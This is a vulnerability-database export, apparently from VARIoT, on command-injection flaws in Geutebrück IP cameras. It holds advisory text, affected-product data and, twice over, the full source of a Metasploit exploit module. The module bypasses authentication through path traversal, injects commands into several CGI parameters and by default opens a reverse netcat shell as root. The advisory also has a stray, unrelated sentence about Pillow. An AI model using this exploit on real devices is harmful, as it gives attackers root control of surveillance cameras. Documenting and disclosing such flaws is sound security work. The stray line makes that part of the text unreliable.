\u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33550",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "id": "VAR-202109-0859",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T22:27:30.399000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158067"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.040000",
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:51.920000",
            "db": "NVD",
            "id": "CVE-2021-33550"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2087"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0857

    Vulnerability from variot - Updated: 2025-01-30 22:14

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0857",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
